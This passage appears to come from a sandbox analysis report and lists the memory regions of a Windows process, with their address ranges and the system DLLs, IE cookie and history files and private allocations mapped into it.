entry_point = 0x160000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1020 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1021 start_va = 0x76ae0000 end_va = 0x76b14fff entry_point = 0x76ae145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1022 start_va = 0x77380000 end_va = 0x77385fff entry_point = 0x77381782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1023 start_va = 0x74940000 end_va = 0x74983fff entry_point = 0x749563f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1024 start_va = 0xf20000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 1025 start_va = 0x74910000 end_va = 0x74916fff entry_point = 0x7491128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1026 start_va = 0x74920000 end_va = 0x7493bfff entry_point = 0x7492a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1027 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1028 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1029 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1030 start_va = 0xfc0000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 1031 start_va = 0x76c60000 end_va = 0x76ce2fff entry_point = 0x76c623d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1032 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1033 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1034 start_va = 0x73ff0000 end_va = 0x74049fff entry_point = 0x73ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 1035 start_va = 0x746b0000 end_va = 0x746bffff entry_point = 0x746b38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1036 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1037 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1038 start_va = 0xeb0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1039 start_va = 0x10e0000 end_va = 0x11dffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 1040 start_va = 0x2850000 end_va = 0x294ffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 1041 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a12dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1042 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1043 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1044 start_va = 0x749d0000 end_va = 0x74a0afff entry_point = 0x749d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1045 start_va = 0x74550000 end_va = 0x7455dfff entry_point = 0x74550000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1046 start_va = 0x630000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1047 start_va = 0xe30000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 1048 start_va = 0x2a50000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1049 start_va = 0x2c50000 end_va = 0x2d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 1050 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 1051 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1052 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1186 start_va = 0x749a0000 end_va = 0x749c0fff entry_point = 0x749a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1187 start_va = 0x75170000 end_va = 0x751b4fff entry_point = 0x751711e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1188 start_va = 0x74540000 end_va = 0x74548fff entry_point = 0x74540000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1189 start_va = 0x2d50000 end_va = 0x3092fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d50000" filename = "" Region: id = 1190 start_va = 0x74660000 end_va = 0x7469bfff entry_point = 0x7466145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1191 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1192 start_va = 0x75700000 end_va = 0x7577afff entry_point = 0x75700000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1193 start_va = 0x5fff0000 end_va = 0x5fffffff entry_point = 0x0 region_type = private name = "private_0x000000005fff0000" filename = "" Region: id = 1194 start_va = 0x74650000 end_va = 0x74654fff entry_point = 0x746515df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1195 start_va = 0x74530000 end_va = 0x74535fff entry_point = 0x74530000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1196 start_va = 0x738c0000 end_va = 0x7393ffff entry_point = 0x738d37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1197 start_va = 0x11e0000 end_va = 0x12befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 1198 start_va = 0x3280000 end_va = 0x32bffff entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 1199 start_va = 0x74010000 end_va = 0x74042fff entry_point = 0x74010000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Program Files (x86)\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files (x86)\\internet explorer\\sqmapi.dll") Region: id = 1200 start_va = 0x746a0000 end_va = 0x746a5fff entry_point = 0x746a14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1201 start_va = 0x73fd0000 end_va = 0x74007fff entry_point = 0x73fd0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1202 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1203 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1204 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1205 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1206 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1207 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1208 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1209 start_va = 0x520000 end_va = 0x58dfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1210 start_va = 0xd90000 end_va = 0xe07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 1211 start_va = 0xf60000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 1212 start_va = 0x2b70000 end_va = 0x2baffff entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 1213 start_va = 0x30d0000 end_va = 0x31cffff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 1214 start_va = 0x3470000 end_va = 0x34affff entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 1215 start_va = 0x3560000 end_va = 0x365ffff entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 1216 start_va = 0x73440000 end_va = 0x73452fff entry_point = 0x73441d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1217 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1218 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1219 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1220 start_va = 0x2a10000 end_va = 0x2a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 1221 start_va = 0x3320000 end_va = 0x341ffff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 1222 start_va = 0x746c0000 end_va = 0x74711fff entry_point = 0x746c14be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1223 start_va = 0x748f0000 end_va = 0x74904fff entry_point = 0x748f12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1224 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1225 start_va = 0x748e0000 end_va = 0x748ecfff entry_point = 0x748e1326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1226 start_va = 0x590000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1227 start_va = 0x748d0000 end_va = 0x748d5fff entry_point = 0x748d125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1228 start_va = 0x2960000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 1229 start_va = 0x3780000 end_va = 0x387ffff entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 1230 start_va = 0x746b0000 end_va = 0x746bffff entry_point = 0x746b38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1231 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1232 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1233 start_va = 0x12c0000 end_va = 0x131cfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 1234 start_va = 0x29b0000 end_va = 0x29effff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 1235 start_va = 0x3230000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 1236 start_va = 0x3890000 end_va = 0x398ffff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 1237 start_va = 0x39a0000 end_va = 0x39affff entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 1238 start_va = 0x39c0000 end_va = 0x3abffff entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 1239 start_va = 0x3b60000 end_va = 0x3b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 1240 start_va = 0x73f70000 end_va = 0x73fc9fff entry_point = 0x73f71f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 1241 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 1242 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 1243 start_va = 0x3b70000 end_va = 0x3f62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b70000" filename = "" Region: id = 1244 start_va = 0x742e0000 end_va = 0x742e7fff entry_point = 0x742e2ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 1245 start_va = 0x5b0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1246 start_va = 0x74020000 end_va = 0x7404cfff entry_point = 0x74020000 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\SysWOW64\\ieui.dll" (normalized: "c:\\windows\\syswow64\\ieui.dll") Region: id = 1247 start_va = 0x742d0000 end_va = 0x742d4fff entry_point = 0x742d0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 1248 start_va = 0x32c0000 end_va = 0x32fffff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 1249 start_va = 0x3660000 end_va = 0x375ffff entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 1250 start_va = 0x742c0000 end_va = 0x742cffff entry_point = 0x742c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 1251 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 1252 start_va = 0x73f50000 end_va = 0x73f61fff entry_point = 0x73f50000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 1253 start_va = 0x2bb0000 end_va = 0x2c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 1254 start_va = 0x31e0000 end_va = 0x321ffff entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 1255 start_va = 0x3f70000 end_va = 0x406ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 1256 start_va = 0x74010000 end_va = 0x74017fff entry_point = 0x74010000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 1257 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 1258 start_va = 0x73f20000 end_va = 0x73f4afff entry_point = 0x73f20000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll") Region: id = 1273 start_va = 0x5d0000 end_va = 0x5d1fff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1274 start_va = 0x5e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1275 start_va = 0x670000 end_va = 0x670fff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1276 start_va = 0x910000 end_va = 0x912fff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 1277 start_va = 0xe10000 end_va = 0xe12fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 1278 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 1279 start_va = 0xe70000 end_va = 0xe72fff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 1280 start_va = 0xe80000 end_va = 0xe82fff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1281 start_va = 0xe90000 end_va = 0xea1fff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 1282 start_va = 0xef0000 end_va = 0xef0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 1283 start_va = 0xf00000 end_va = 0xf00fff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 1284 start_va = 0xf10000 end_va = 0xf10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 1285 start_va = 0xfa0000 end_va = 0xfa0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 1286 start_va = 0xfb0000 end_va = 0xfb0fff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 1287 start_va = 0x10c0000 end_va = 0x10c3fff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 1288 start_va = 0x10d0000 end_va = 0x10d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 1289 start_va = 0x1320000 end_va = 0x1320fff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 1290 start_va = 0x1330000 end_va = 0x1330fff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 1291 start_va = 0x2800000 end_va = 0x280dfff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1292 start_va = 0x3520000 end_va = 0x355ffff entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 1293 start_va = 0x3a20000 end_va = 0x3a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 1294 start_va = 0x4100000 end_va = 0x41fffff entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1295 start_va = 0x4200000 end_va = 0x4b2ffff entry_point = 0x4200000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1296 start_va = 0x742f0000 end_va = 0x743e4fff entry_point = 0x74300d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1297 start_va = 0x2810000 end_va = 0x282efff entry_point = 0x2810000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db") Region: id = 1298 start_va = 0x2830000 end_va = 0x2830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 1299 start_va = 0x754f0000 end_va = 0x75516fff entry_point = 0x754f58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1300 start_va = 0x755b0000 end_va = 0x755c1fff entry_point = 0x755b1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1301 start_va = 0x76940000 end_va = 0x76adcfff entry_point = 0x769417e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1302 start_va = 0x27f0000 end_va = 0x27f1fff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 1303 start_va = 0x74570000 end_va = 0x7459efff entry_point = 0x74571142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1403 start_va = 0x2840000 end_va = 0x2840fff entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1404 start_va = 0x2950000 end_va = 0x2950fff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 1405 start_va = 0x29a0000 end_va = 0x29a0fff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 1406 start_va = 0x29f0000 end_va = 0x29f0fff entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 1407 start_va = 0x2a00000 end_va = 0x2a00fff entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1408 start_va = 0x2b50000 end_va = 0x2b50fff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 1409 start_va = 0x2b60000 end_va = 0x2b60fff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 1410 start_va = 0x2c30000 end_va = 0x2c30fff entry_point = 0x0 region_type = private name = "private_0x0000000002c30000" filename = "" Region: id = 1411 start_va = 0x2c40000 end_va = 0x2c40fff entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 1412 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 1413 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 1414 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 1415 start_va = 0x31d0000 end_va = 0x31d0fff entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 1416 start_va = 0x3220000 end_va = 0x3220fff entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 1417 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 1418 start_va = 0x3240000 end_va = 0x3240fff entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 1419 start_va = 0x3250000 end_va = 0x3250fff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 1420 start_va = 0x3260000 end_va = 0x3260fff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 1421 start_va = 0x3270000 end_va = 0x3270fff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 1422 start_va = 0x3300000 end_va = 0x3300fff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1423 start_va = 0x3310000 end_va = 0x3310fff entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 1424 start_va = 0x3420000 end_va = 0x3420fff entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 1425 start_va = 0x3430000 end_va = 0x3430fff entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 1426 start_va = 0x3440000 end_va = 0x3440fff entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 1427 start_va = 0x3450000 end_va = 0x3450fff entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 1428 start_va = 0x3460000 end_va = 0x3460fff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 1429 start_va = 0x34b0000 end_va = 0x34b0fff entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 1430 start_va = 0x34c0000 end_va = 0x34c0fff entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 1431 start_va = 0x34d0000 end_va = 0x34d0fff entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 1432 start_va = 0x34e0000 end_va = 0x34e0fff entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 1433 start_va = 0x34f0000 end_va = 0x34f0fff entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 1434 start_va = 0x3500000 end_va = 0x3500fff entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 1435 start_va = 0x3510000 end_va = 0x3510fff entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 1436 start_va = 0x3760000 end_va = 0x3760fff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 1437 start_va = 0x3770000 end_va = 0x3775fff entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 1438 start_va = 0x3880000 end_va = 0x3880fff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 1439 start_va = 0x3990000 end_va = 0x3991fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003990000" filename = "" Region: id = 1440 start_va = 0x39d0000 end_va = 0x39effff entry_point = 0x0 region_type = private name = "private_0x00000000039d0000" filename = "" Region: id = 1441 start_va = 0x3a60000 end_va = 0x3b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a60000" filename = "" Region: id = 1442 start_va = 0x73580000 end_va = 0x736eefff entry_point = 0x73580000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll") Region: id = 1443 start_va = 0x739c0000 end_va = 0x73a71fff entry_point = 0x739c0000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: 